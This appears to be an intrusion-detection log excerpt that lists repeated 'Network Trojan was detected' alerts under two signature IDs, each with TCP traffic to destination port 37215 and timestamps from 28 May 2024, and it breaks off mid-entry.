          SID:2835222
          Source Port:44960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622224
          SID:2829579
          Source Port:46906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324644
          SID:2835222
          Source Port:55264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493218
          SID:2829579
          Source Port:59174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.814317
          SID:2829579
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819065
          SID:2829579
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842351
          SID:2835222
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102997
          SID:2835222
          Source Port:40428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201502
          SID:2835222
          Source Port:45838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594174
          SID:2835222
          Source Port:42558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.926999
          SID:2835222
          Source Port:48572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176291
          SID:2829579
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767010
          SID:2829579
          Source Port:33664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959007
          SID:2835222
          Source Port:47664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334212
          SID:2835222
          Source Port:41272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847791
          SID:2835222
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652389
          SID:2829579
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.338034
          SID:2829579
          Source Port:36382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588704
          SID:2829579
          Source Port:59546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196858
          SID:2835222
          Source Port:44288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213871
          SID:2835222
          Source Port:38832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369105
          SID:2835222
          Source Port:40218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046954
          SID:2829579
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535714
          SID:2829579
          Source Port:37910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.227241
          SID:2835222
          Source Port:53612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217195
          SID:2835222
          Source Port:50400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401301
          SID:2835222
          Source Port:39700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867846
          SID:2829579
          Source Port:35358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849289
          SID:2835222
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065038
          SID:2835222
          Source Port:42296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893301
          SID:2829579
          Source Port:60130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195115
          SID:2829579
          Source Port:53970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328776
          SID:2835222
          Source Port:59866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.625592
          SID:2835222
          Source Port:42362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.074417
          SID:2835222
          Source Port:57150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677734
          SID:2829579
          Source Port:47622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847352
          SID:2829579
          Source Port:34116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215687
          SID:2829579
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656279
          SID:2829579
          Source Port:39048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664084
          SID:2829579
          Source Port:41418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812987
          SID:2829579
          Source Port:54606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161819
          SID:2829579
          Source Port:47812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102267
          SID:2829579
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239658
          SID:2835222
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266622
          SID:2835222
          Source Port:53350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244785
          SID:2829579
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652239
          SID:2835222
          Source Port:44296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267565
          SID:2835222
          Source Port:53464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806950
          SID:2829579
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943249
          SID:2829579
          Source Port:58400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488245
          SID:2835222
          Source Port:35438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157578
          SID:2835222
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.759181
          SID:2829579
          Source Port:50110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735461
          SID:2829579
          Source Port:51476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337578
          SID:2829579
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608843
          SID:2829579
          Source Port:55236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146093
          SID:2835222
          Source Port:48300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302255
          SID:2829579
          Source Port:47356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285142
          SID:2835222
          Source Port:58730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177927
          SID:2829579
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847498
          SID:2829579
          Source Port:42496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528217
          SID:2835222
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270354
          SID:2829579
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756337
          SID:2829579
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272394
          SID:2835222
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269853
          SID:2829579
          Source Port:53648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475735
          SID:2829579
          Source Port:59732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103292
          SID:2829579
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.624754
          SID:2829579
          Source Port:58632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989164
          SID:2829579
          Source Port:42510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977287
          SID:2835222
          Source Port:47336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033246
          SID:2835222
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537550
          SID:2835222
          Source Port:38822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797610
          SID:2829579
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270523
          SID:2835222
          Source Port:34250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470603
          SID:2835222
          Source Port:51280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977375
          SID:2829579
          Source Port:46166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492861
          SID:2835222
          Source Port:42786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877874
          SID:2835222
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231715
          SID:2829579
          Source Port:48156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708527
          SID:2835222
          Source Port:36826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782983
          SID:2835222
          Source Port:59564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635875
          SID:2835222
          Source Port:40344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.306705
          SID:2829579
          Source Port:57852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484766
          SID:2829579
          Source Port:48858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138012
          SID:2829579
          Source Port:57900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535729
          SID:2829579
          Source Port:43270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794227
          SID:2835222
          Source Port:49098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542046
          SID:2829579
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978359
          SID:2829579
          Source Port:42180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932683
          SID:2835222
          Source Port:51664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103035
          SID:2829579
          Source Port:33684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949870
          SID:2829579
          Source Port:48928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542282
          SID:2835222
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960657
          SID:2829579
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334665
          SID:2829579
          Source Port:36938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841091
          SID:2829579
          Source Port:44658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048740
          SID:2835222
          Source Port:56880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201804
          SID:2835222
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146155
          SID:2835222
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839497
          SID:2835222
          Source Port:39188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657121
          SID:2829579
          Source Port:53688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280890
          SID:2829579
          Source Port:51964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849174
          SID:2835222
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891920
          SID:2835222
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561105
          SID:2829579
          Source Port:56460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230239
          SID:2829579
          Source Port:33790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298846
          SID:2829579
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513143
          SID:2829579
          Source Port:55414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269712
          SID:2829579
          Source Port:43506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743536
          SID:2829579
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.856208
          SID:2835222
          Source Port:52210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208189
          SID:2835222
          Source Port:35780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216400
          SID:2829579
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224887
          SID:2829579
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088093
          SID:2829579
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923487
          SID:2829579
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059578
          SID:2835222
          Source Port:34056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893378
          SID:2835222
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923303
          SID:2835222
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156487
          SID:2829579
          Source Port:60180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298524
          SID:2829579
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472095
          SID:2829579
          Source Port:47334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355836
          SID:2835222
          Source Port:59688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009978
          SID:2835222
          Source Port:58938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090597
          SID:2835222
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551711
          SID:2835222
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270371
          SID:2835222
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239623
          SID:2835222
          Source Port:45022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535562
          SID:2829579
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941249
          SID:2829579
          Source Port:37258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547509
          SID:2835222
          Source Port:53986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595140
          SID:2835222
          Source Port:34282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543200
          SID:2835222
          Source Port:52458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727172
          SID:2829579
          Source Port:59288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627152
          SID:2829579
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480324
          SID:2829579
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210730
          SID:2829579
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115450
          SID:2835222
          Source Port:57036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195921
          SID:2835222
          Source Port:58464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685991
          SID:2829579
          Source Port:43816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497721
          SID:2835222
          Source Port:50784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291687
          SID:2835222
          Source Port:52272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669060
          SID:2829579
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473584
          SID:2835222
          Source Port:59414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.823268
          SID:2835222
          Source Port:55254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117170
          SID:2829579
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.184022
          SID:2835222
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411804
          SID:2829579
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164617
          SID:2835222
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352807
          SID:2835222
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607512
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728772
          SID:2829579
          Source Port:40264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299554
          SID:2829579
          Source Port:43602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348940
          SID:2835222
          Source Port:44402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839491
          SID:2829579
          Source Port:56070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475607
          SID:2835222
          Source Port:53614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216392
          SID:2835222
          Source Port:41728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543370
          SID:2829579
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565189
          SID:2829579
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.556738
          SID:2835222
          Source Port:40642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102997
          SID:2835222
          Source Port:50150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529215
          SID:2829579
          Source Port:34384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841321
          SID:2835222
          Source Port:33828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008815
          SID:2829579
          Source Port:39026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329604
          SID:2829579
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939320
          SID:2829579
          Source Port:35208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189076
          SID:2829579
          Source Port:51710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196410
          SID:2829579
          Source Port:50154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848346
          SID:2835222
          Source Port:41140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416838
          SID:2835222
          Source Port:59924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465117
          SID:2835222
          Source Port:38994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891122
          SID:2835222
          Source Port:37198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914072
          SID:2829579
          Source Port:55576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979172
          SID:2835222
          Source Port:54812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237138
          SID:2835222
          Source Port:33460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085364
          SID:2835222
          Source Port:36796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093252
          SID:2829579
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794398
          SID:2829579
          Source Port:43422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283602
          SID:2829579
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536704
          SID:2835222
          Source Port:44858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953220
          SID:2829579
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590705
          SID:2835222
          Source Port:41788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114535
          SID:2835222
          Source Port:44338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156196
          SID:2829579
          Source Port:39030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431503
          SID:2835222
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627661
          SID:2835222
          Source Port:48570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845139
          SID:2829579
          Source Port:53260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938040
          SID:2829579
          Source Port:36976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403039
          SID:2829579
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800757
          SID:2829579
          Source Port:33746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728962
          SID:2829579
          Source Port:59268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862964
          SID:2835222
          Source Port:35390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113070
          SID:2835222
          Source Port:58560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435462
          SID:2829579
          Source Port:45600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357046
          SID:2829579
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425113
          SID:2835222
          Source Port:55976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484140
          SID:2829579
          Source Port:55694
          Destination Port:37215
